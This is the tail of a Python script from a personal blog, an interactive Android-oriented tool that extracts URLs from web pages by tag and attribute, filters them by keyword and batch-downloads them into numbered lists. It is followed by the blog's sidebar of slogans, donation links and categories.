			way_X=int_s(input("\n\n" + CYAN + "抓取方式:\n(1)搜尋頁面所有純文字網址\n(2)抓取所有A標籤HREF屬性\n(3)抓取所有IMG標籤SRC屬性\n(4)抓取所有SOURCE標籤SRC屬性\n(5)抓取所有EMBED標籤SRC屬性\n(6)抓取所有OBJECT標籤DATA屬性\n(7)抓取所有LINK標籤HREF屬性\n(8)抓取所有SCRIPT標籤SRC屬性\n(9)抓取所有FRAME標籤SRC屬性\n(10)抓取所有IFRAME標籤SRC屬性\n(11)使用以上所有方法\n(12)自訂找尋標籤名及屬性名\n(13)自訂找尋ID及屬性名\n(14)自訂找尋Name及屬性名" + END + "\n\n"))
			if way_X<=14 and way_X>=1:
				break
		else:
			print("輸入有誤!")
		if way_X==12 or way_X==13 or way_X==14:	
			target_tagname_=str(input("\n目標標籤名稱/ID/Name:"))
			target_attribute_=str(input("\n目標屬性名稱:"))
		else:
			target_tagname_=""
			target_attribute_=""
		temp_url=url_correct(str(input("\n目標網頁URL:")))
		temp_url_code=str(input("\n目標網頁編碼(請輸入utf-8或big5或gbk…):"))
		keywords=str(input("\n" + CYAN + "請輸入過濾關鍵字(可留空,可多個,逗號為分隔符號):" + END + "\n\n"))
		and_or=0
		if keywords!="":
			while True:
				and_or=(-1)
				try:
					and_or=int_s(input("\n" + CYAN + "請輸入關鍵字邏輯閘:(1=and、0=or)" + END + "\n\n"))
				except:
					print("")
				if and_or==0 or and_or==1:
					break
				else:
					print("輸入有誤!\n")
		html_code=download_URL(temp_url,save_temp_dir,0,0,temp_url_code,1)
		if html_code=="ERROR":
			continue
		run_functional_get_url(way_X,html_code,target_array_index,and_or,keywords,target_tagname_,target_attribute_)
		input("\n\n完成!請輸入ENTER鍵跳出此功能...");
	elif(method_X==2):
		while True:
			RUN_array_index=int_s(input("\n\n" + CYAN + "您要「載入」的目標清單:(請輸入編號1~8)" + END + "\n\n"))
			if RUN_array_index<=8 and RUN_array_index>=1:
				break
			else:
				print("輸入有誤!只開放8個清單,請輸入1~8之間的號碼!")
		while True:
			target_array_index=int_s(input("\n\n" + CYAN + "您要「存入」的目標清單:(請輸入編號1~8)" + END + "\n\n"))
			if target_array_index<=8 and target_array_index>=1:
				break
			else:
				print("輸入有誤!只開放8個清單,請輸入1~8之間的號碼!")
		while True:
			way_X=int_s(input("\n\n" + CYAN + "抓取方式:\n(1)搜尋頁面所有純文字網址\n(2)抓取所有A標籤HREF屬性\n(3)抓取所有IMG標籤SRC屬性\n(4)抓取所有SOURCE標籤SRC屬性\n(5)抓取所有EMBED標籤SRC屬性\n(6)抓取所有OBJECT標籤DATA屬性\n(7)抓取所有LINK標籤HREF屬性\n(8)抓取所有SCRIPT標籤SRC屬性\n(9)抓取所有FRAME標籤SRC屬性\n(10)抓取所有IFRAME標籤SRC屬性\n(11)使用以上所有方法\n(12)自訂找尋標籤名及屬性名\n(13)自訂找尋ID及屬性名\n(14)自訂找尋Name及屬性名" + END + "\n\n"))
			if way_X<=14 and way_X>=1:
				break
		else:
			print("輸入有誤!")
		if way_X==12 or way_X==13 or way_X==14:
			target_tagname_=str(input("\n目標標籤名稱/ID/Name:"))
			target_attribute_=str(input("\n目標屬性名稱:"))
		else:
			target_tagname_=""
			target_attribute_=""
		keywords=str(input("\n" + CYAN + "請輸入過濾關鍵字(可留空,可多個,逗號為分隔符號):" + END + "\n\n"))
		while True:
			and_or=int_s(input("\n" + CYAN + "請輸入關鍵字邏輯閘:(1=and、0=or)" + END + "\n\n"))
			if and_or==0 or and_or==1:
				break
			else:
				print("輸入有誤!\n\n")
		temp_url_code=str(input("\n集合的網頁編碼(請輸入utf-8或big5或gbk…):"))
		for x in range(0,(len(target_url[RUN_array_index]))):
			html_code=download_URL(str(target_url[RUN_array_index][x]),save_temp_dir,(x+1),len(target_url[RUN_array_index]),temp_url_code,1)
			if html_code=="ERROR":
				continue
			run_functional_get_url(way_X,html_code,target_array_index,and_or,keywords,target_tagname_,target_attribute_)
		input("\n\n完成!請輸入ENTER鍵跳出此功能...");
	elif(method_X==3):
		start_number=int_s(input("起始點(數字):"))
		end_number=int_s(input("終止點(數字):"))
		step_ADD=int_s(input("每次遞增多少:"))
		str_padx=int_s(input("補滿位數至:"))
		if not os.path.exists('/sdcard/' + save_dir) :
			os.makedirs('/sdcard/' + save_dir )
		print(LIME + "※檔案將存在/sdcard/" + save_dir + "資料夾。" + END)
		while True:
			url=url_correct(input(LIME + "目標URL({i}是遞增數):" + END))
			if url.find("{i}")>=0:
				break
			else:
				print("網址未包含遞增數,請重新輸入網址。")
		for x in range(start_number,(end_number+1),step_ADD):
			download_URL(url.replace("{i}",str(x).zfill(str_padx)),save_dir,x,(end_number),"utf-8",0)
		input("\n\n完成!請輸入ENTER鍵跳出此功能...")
	elif(method_X==4):
		while True:
			RUN_array_index=int_s(input("\n\n" + CYAN + "您要「顯示」的目標清單:(請輸入編號1~8)" + END + "\n\n"))
			if RUN_array_index<=8 and RUN_array_index>=1:
				break
			else:
				print("輸入有誤!只開放8個清單,請輸入1~8之間的號碼!")
		for x in range(0,(len(target_url[RUN_array_index]))):
			print("URL (" + str(x+1) + "/" + str(len(target_url[RUN_array_index])) + "):" + str(target_url[RUN_array_index][x]))
		input("\n\n完成!請輸入ENTER鍵跳出此功能...")
	elif(method_X==5):
		while True:
			RUN_array_index=int_s(input("\n\n" + CYAN + "您要「下載」的目標清單:(請輸入編號1~8)" + END + "\n\n"))
			if RUN_array_index<=8 and RUN_array_index>=1:
				break
			else:
				print("輸入有誤!只開放8個清單,請輸入1~8之間的號碼!")
		for x in range(0,(len(target_url[RUN_array_index]))):
			download_URL(str(target_url[RUN_array_index][x]),save_dir,(x+1),len(target_url[RUN_array_index]),"utf-8",0)
		input("\n\n完成!請輸入ENTER鍵跳出此功能...")
	elif(method_X==6):
		ver = str(input("\n\n" + RED + "確定清空目標清單?(y/n)" + END + "\n\n"))
		if ver.lower()=="y":
			while True:
				RUN_array_index=int_s(input("\n\n" + CYAN + "您要「清空」的目標清單:(請輸入編號1~8)" + END + "\n\n"))
				if RUN_array_index<=8 and RUN_array_index>=1:
					break
				else:
					print("輸入有誤!只開放8個清單,請輸入1~8之間的號碼!")
			target_url[RUN_array_index]=[]
			input("\n\n完成!請輸入ENTER鍵跳出此功能...")
	elif(method_X==7):
		ver = str(input("\n\n" + RED + "確定複製目標清單?(y/n)" + END + "\n\n"))
		if ver.lower()=="y":
			while True:
				RUN_array_index=int_s(input("\n\n" + CYAN + "您要「複製」的來源清單:(請輸入編號1~8)" + END + "\n\n"))
				if RUN_array_index<=8 and RUN_array_index>=1:
					break
				else:
					print("輸入有誤!只開放8個清單,請輸入1~8之間的號碼!")
			while True:
				target_array_index=int_s(input("\n\n" + CYAN + "您要「存入」的目標清單:(請輸入編號1~8)" + END + "\n\n"))
				if target_array_index<=8 and target_array_index>=1:
					break
				else:
					print("輸入有誤!只開放8個清單,請輸入1~8之間的號碼!")
			target_url[target_array_index]=target_url[RUN_array_index]
			input("\n\n完成!請輸入ENTER鍵跳出此功能...")
	elif(method_X==8):
		ver = str(input("\n\n" + RED + "確定刪除目標清單特定值?(y/n)" + END + "\n\n"))
		if ver.lower()=="y":
			while True:
				RUN_array_index=int_s(input("\n\n" + CYAN + "您要「刪除值」的目標清單:(請輸入編號1~8)" + END + "\n\n"))
				if RUN_array_index<=8 and RUN_array_index>=1:
					break
				else:
					print("輸入有誤!只開放8個清單,請輸入1~8之間的號碼!")
			if len(target_url[RUN_array_index])!=0:
				while True:
					target_array_index=int_s(input("\n\n" + CYAN + "您要「刪除的值編號」:(請輸入編號0~" + str(len(target_url[RUN_array_index])-1) + ")" + END + "\n\n"))
					if target_array_index>=0 and target_array_index<=(len(target_url[RUN_array_index])-1):
						break
					else:
						print("輸入有誤!請輸入0~" + str(len(target_url[RUN_array_index])-1) + "之間的號碼!")
				del target_url[RUN_array_index][target_array_index]
			else:
				print("空清單!無任何值!故無法刪除。")
			input("\n\n完成!請輸入ENTER鍵跳出此功能...")
	elif(method_X==9):
		ver = str(input("\n\n" + RED + "確定從剪貼簿貼上目標清單?(y/n)" + END + "\n\n"))
		if ver.lower()=="y":
			while True:
				target_array_index=int_s(input("\n\n" + CYAN + "您要「存入」的目標清單:(請輸入編號1~8)" + END + "\n\n"))
				if target_array_index<=8 and target_array_index>=1:
					break
				else:
					print("輸入有誤!只開放8個清單,請輸入1~8之間的號碼!")
			kk=get_clipboard()
			if kk=="" or kk==None:
				print(RED + "剪貼簿是空的!" + END)
			else:
				ori_size=len(target_url[target_array_index])
				target_url[target_array_index].extend(kk.split("\n"))
				target_url[target_array_index]=remove_duplicates(target_url[target_array_index])
				print(LIME + "已添加進去 " + str(len(target_url[target_array_index])-ori_size) + " 個不重複的URL。" + END)
			input("\n\n完成!請輸入ENTER鍵跳出此功能...")
input("\n\n請輸入ENTER鍵結束...")

 


This entry was posted in General, Experience, Free, Functions, Note, Product, Python By Weil Jimmer.

最前頁 上一頁  1 2 3 4 5 6 /6 頁)下一頁 最終頁

Visitor Count

pop
nonenonenone

Note

支持網路中立性.
Support Net Neutrality.

飽暖思淫欲,饑寒起盜心。

支持臺灣實施無條件基本收入

今天是國際古蹟遺址日。

Words Quiz


Search

Music

Blogging Journey

4248days

since our first blog post.

Republic Of China
The strong do what they can and the weak suffer what they must.

Privacy is your right and ability to be yourself and express yourself without the fear that someone is looking over your shoulder and that you might be punished for being yourself, whatever that may be.

It is quality rather than quantity that matters.

I WANT Internet Freedom.

Reality made most of people lost their childishness.

Justice,Freedom,Knowledge.

Without music life would be a mistake.

Support/Donate

This site also need a little money to maintain operations, not entirely without any cost in the Internet. Your donations will be the best support and power of the site.
MethodBitcoin Address
bitcoin1gtuwCjjVVrNUHPGvW6nsuWGxSwygUv4x
buymeacoffee
Register in linode via invitation link and stay active for three months.Linode

Support The Zeitgeist Movement

The Zeitgeist Movement

The Lie We Live

The Lie We Live

The Questions We Never Ask

The Questions We Never Ask

Man

Man

THE EMPLOYMENT

Man

In The Fall

In The Fall

Facebook is EATING the Internet

Facebook

Categories

Android (7)

Announcement (4)

Arduino (2)

Bash (2)

C (3)

C# (5)

C++ (1)

Experience (50)

Flash (2)

Free (13)

Functions (36)

Games (13)

General (57)

HTML (7)

Java (13)

JS (7)

Mood (24)

Note (30)

Office (1)

OpenWrt (5)

PHP (9)

Privacy (4)

Product (12)

Python (4)

Software (11)

The Internet (24)

Tools (16)

VB.NET (8)

WebHosting (7)

Wi-Fi (5)

XML (4)